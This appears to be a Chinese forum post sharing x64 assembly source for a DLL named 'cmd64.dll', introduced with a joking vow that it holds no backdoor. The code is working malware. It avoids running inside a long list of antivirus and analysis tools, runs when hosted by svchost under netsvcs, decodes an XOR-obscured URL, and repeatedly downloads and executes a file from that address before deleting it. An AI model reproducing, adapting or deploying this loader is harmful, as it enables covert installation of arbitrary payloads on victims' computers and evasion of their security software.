|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
蓝屏重启是正常现象。我保证绝对没有后门。我对灯发誓,如果有后门,立刻就没电。
 includelib G:\RadASM\Masm64\SDK\Lib\kernel32.lib includelib G:\RadASM\Masm64\SDK\Lib\user32.lib includelib G:\RadASM\Masm64\SDK\Lib\urlmon.lib includelib G:\RadASM\Masm64\SDK\Lib\Shlwapi.lib EXTERN CreateThread :proc EXTERN DisableThreadLibraryCalls :proc EXTERN Sleep :proc EXTERN LoadLibraryA :proc ; EXTERN URLDownloadToFileA :proc EXTERN GetFileAttributesA :proc EXTERN WinExec :proc EXTERN GetTempPathA :proc EXTERN GetTempFileNameA :proc EXTERN GetModuleFileNameA :proc EXTERN GetProcAddress :proc ; EXTERN CreateMutexA :proc EXTERN CloseHandle :proc EXTERN DeleteFileA :proc EXTERN ExitProcess :proc EXTERN PathFindFileNameA :proc EXTERN GetCommandLineA :proc EXTERN StrStrIA :proc ; EXTERN MessageBoxA :proc EXTERN QueueUserWorkItem :proc EXTERN GetModuleHandleA :proc .data URL db "1111",0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 Urlmon db "Urlmon.dll",0 URLDown db "URLDownloadToFileA",0 stricmp db "_stricmp",0 ntdll db "ntdll.dll",0 netsvcs db "netsvcs",0 svchost db "svchost.exe",0 XueTr db "XueTr.exe",0 PowerTool db "PowerTool.exe",0 UfSeAgnt db "UfSeAgnt.exe",0 ;趋势 TMBMSRV db "TMBMSRV.exe",0 ;趋势 SfCtlCom db "SfCtlCom.exe",0 ;趋势 TmProxy db "TmProxy.exe",0 ;趋势 bdagent db "bdagent.exe",0 ;罗马尼亚反病毒软件 livesrv db "livesrv.exe",0 ;罗马尼亚杀毒软件在线升级程序 seccenter db "seccenter.exe",0 ;马尼亚反病毒软件 vsserv db "vsserv.exe",0 ;马尼亚反病毒软件 MPSVC db "MPSVC.exe",0 ;微点主动防御 MPSVC1 db "MPSVC1.exe",0 MPSVC2 db "MPSVC2.exe",0 MPMon db "MPMon.exe",0 ;微点主动防御 ast db "ast.exe",0 ;超级巡警 xiufu db "gmer.exe",0 avp db "avp.exe",0 ;卡巴斯基 egui db "egui.exe",0 ;Eset NOD32 ccSvcHst db "ccSvcHst.exe",0;诺顿 mcagent db "mcagent.exe",0 ;麦咖啡 mcmscsvc db "mcmscsvc.exe",0 McNASvc db "McNASvc.exe",0 Mcods db "Mcods.exe",0 McProxy db "McProxy.exe",0 Mcshield db "Mcshield.exe",0 mcsysmon db "mcsysmon.exe",0 mcvsshld db "mcvsshld.exe",0 MpfSrv db "MpfSrv.exe",0 McSACore db "McSACore.exe",0 msksrver db "msksrver.exe",0 sched db "sched.exe",0 ;小红伞 avguard db "avguard.exe",0 avmailc db "avmailc.exe",0 avwebgrd db "avwebgrd.exe",0 avgnt db "avgnt.exe",0 avcenter db "avcenter.exe",0 afwServ db "afwServ.exe",0 AvastUI db "AvastUI.exe",0 FilMsg db "FilMsg.exe",0;费尔 Twister db "Twister.exe",0 dwengine db "dwengine.exe",0;大蜘蛛 spidernt db "spidernt.exe",0;驱逐舰 spiderui db "spiderui.exe",0 spideragent db "spideragent.exe",0 SpIDerMl db "SpIDerMl.exe",0 avfwsvc db "avfwsvc.exe",0 avshadow db "avshadow.exe",0;小红伞 avgcsrvx db "avgcsrvx.exe",0;AVG avgemc db "avgemc.exe",0 avgnsx db "avgnsx.exe",0 avgrsx db "avgrsx.exe",0 avgtray db "avgtray.exe",0 avgwdsvc db "avgwdsvc.exe",0 Hstricmp QWORD 0 ;stricmp函数的地址 hInst QWORD 0 reason QWORD 0 reserved1 QWORD 0 .code Entry proc ;hInst:qword, reason:qword, reserved1:qword push rbp mov rbp,rsp mov hInst,rcx mov reason,rdx mov reserved1,r8 sub rsp,10h ; 按照参数个数分配堆栈 and spl,0F0H ;平衡堆栈 cmp reason,1 jnz @1 call kiil jmp @2 @1: mov rcx,hInst call DisableThreadLibraryCalls;禁止DLL_THREAD_ATTACH和DLL_THREAD_DETACH通知指定的动态链接库 push 1 pop rax @2: mov rsp,rbp pop rbp ret Entry Endp XIAZAI proc LOCAL _URL[80] :BYTE LOCAL lpHandles : QWORD LOCAL IpURLDown : QWORD LOCAL TempPath[260] :BYTE sub rsp,30h and spl,0F0H mov rcx,60000 call Sleep lea rcx,Urlmon call LoadLibraryA mov rcx,rax lea rdx,URLDown call GetProcAddress mov IpURLDown,rax lea rbx, URL lea rdx,_URL mov rcx,76 @w: mov r8b,[rbx] cmp r8b,0 jz @r xor r8b,15h mov [rdx],r8b inc rbx inc rdx loop @w @r: xor r8w,r8w mov [rdx],r8w @9: mov lpHandles ,0 mov rcx,260 lea rdx,TempPath call GetTempPathA lea rcx,TempPath xor rdx,rdx xor r8,r8 lea r9,TempPath call GetTempFileNameA @6: xor rcx,rcx lea rdx,_URL lea r8,TempPath xor r9,r9 mov [rsp+4*8],r9 call IpURLDown;下载文件 OR EAX,EAX jnz @3 lea rcx, TempPath call GetFileAttributesA ;检索文件属性 cmp EAX, -1 je @3 lea rcx, TempPath mov rdx,0 call WinExec ;运行文件 mov lpHandles ,1 mov rcx,60000 call Sleep lea rcx,TempPath call DeleteFileA @3: mov rcx,10000 call Sleep cmp lpHandles ,1 je @5 jmp @6 @5: mov rcx,3600000 call Sleep jmp @9 ret XIAZAI endp kiil proc LOCAL Gfilename [260] :BYTE LOCAL shuzu [54] :QWORD LOCAL Command :QWORD;命令行指针 LOCAL ssss :QWORD;文件名字指针 LOCAL pppp :QWORD;存放特征名字地址 sub rsp,30h and spl,0F0h mov rax,offset avgwdsvc mov shuzu ,rax mov rax,offset avgtray mov shuzu+1*8, rax mov rax,offset avgrsx mov shuzu+2*8, rax mov rax,offset avgnsx mov shuzu+3*8, rax mov rax,offset XueTr mov shuzu+4*8, rax mov rax,offset PowerTool mov shuzu+5*8, rax mov rax,offset UfSeAgnt mov shuzu+6*8, rax mov rax,offset TMBMSRV mov shuzu+7*8, rax mov rax,offset SfCtlCom mov shuzu+8*8, rax mov rax,offset TmProxy mov shuzu+9*8, rax mov rax,offset avshadow mov shuzu+10*8, rax mov rax,offset avgcsrvx mov shuzu+11*8, rax mov rax,offset avgemc mov shuzu+12*8, rax mov rax,offset bdagent mov shuzu+13*8, rax mov rax,offset livesrv mov shuzu+14*8, rax mov rax,offset seccenter mov shuzu+15*8, rax mov rax,offset vsserv mov shuzu+16*8, rax mov rax,offset MPSVC mov shuzu+17*8, rax mov rax,offset MPSVC1 mov shuzu+18*8, rax mov rax,offset MPSVC2 mov shuzu+19*8, rax mov rax,offset MPMon mov shuzu+20*8, rax mov rax,offset ast mov shuzu+21*8, rax mov rax,offset avfwsvc mov shuzu+22*8, rax mov rax,offset xiufu mov shuzu+23*8, rax mov rax,offset avp mov shuzu+24*8, rax mov rax,offset spidernt mov shuzu+25*8, rax mov rax,offset spiderui mov shuzu+26*8, rax mov rax,offset spideragent mov shuzu+27*8, rax mov rax,offset SpIDerMl mov shuzu+28*8, rax mov rax,offset Twister mov shuzu+29*8, rax mov rax,offset dwengine mov shuzu+30*8, rax mov rax,offset egui mov shuzu+31*8, rax mov rax,offset ccSvcHst mov shuzu+32*8, rax mov rax,offset mcagent mov shuzu+33*8, rax mov rax,offset mcmscsvc mov shuzu+34*8, rax mov rax,offset McNASvc mov shuzu+35*8, rax mov rax,offset Mcods mov shuzu+36*8, rax mov rax,offset McProxy mov shuzu+37*8, rax mov rax,offset Mcshield mov shuzu+38*8, rax mov rax,offset mcsysmon mov shuzu+39*8, rax mov rax,offset mcvsshld mov shuzu+40*8, rax mov rax,offset MpfSrv mov shuzu+41*8, rax mov rax,offset McSACore mov shuzu+42*8, rax mov rax,offset msksrver mov shuzu+43*8, rax mov rax,offset sched mov shuzu+44*8, rax mov rax,offset avguard mov shuzu+45*8, rax mov rax,offset avmailc mov shuzu+46*8, rax mov rax,offset avwebgrd mov shuzu+47*8, rax mov rax,offset avgnt mov shuzu+48*8, rax mov rax,offset avcenter mov shuzu+49*8, rax mov rax,offset afwServ mov shuzu+50*8, rax mov rax,offset AvastUI mov shuzu+51*8, rax mov rax,offset FilMsg mov shuzu+52*8, rax xor rax,rax mov shuzu+53*8,rax lea rcx,ntdll call GetModuleHandleA ;////////////////////////////////////////////////////////////////// mov rcx,rax lea rdx,stricmp call GetProcAddress mov Hstricmp,rax xor rcx,rcx lea rdx,Gfilename mov r8,260 call GetModuleFileNameA;获取文件路径 lea rcx,Gfilename call PathFindFileNameA ;获取文件名字 mov ssss ,rax call GetCommandLineA ;获取命令行 mov Command,rax lea rax,shuzu mov pppp,rax @4: mov rdx, ssss mov rax, pppp mov rcx,[rax] call Hstricmp cmp rax,0 jnz @3 xor rcx,rcx call ExitProcess @3: add pppp,8 mov rax,pppp cmp QWORD ptr [rax],0 jnz @4 lea rcx,svchost mov rdx, ssss call Hstricmp ;字符转比较 cmp rax,0 jnz @8 mov rcx,Command lea rdx,netsvcs call StrStrIA ;字符转搜索 test rax,rax je @8 xor rcx,rcx xor rdx,rdx lea r8,XIANCHENG xor r9,r9 mov [rsp+4*8],r9 mov [rsp+5*8],r9 call CreateThread;创建下载线程 mov rcx,rax call CloseHandle mov rax,1 jmp @s @8: xor rax,rax @s: ret kiil endp XIANCHENG proc push rbp mov rbp,rsp sub rsp,20h and spl,0F0h lea rcx,XIAZAI xor rdx,rdx mov r8,10h ;WT_EXECUTELONGFUNCTION call QueueUserWorkItem mov rsp,rbp pop rbp ret XIANCHENG endp END 这个是cmd64.dll的源代码 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
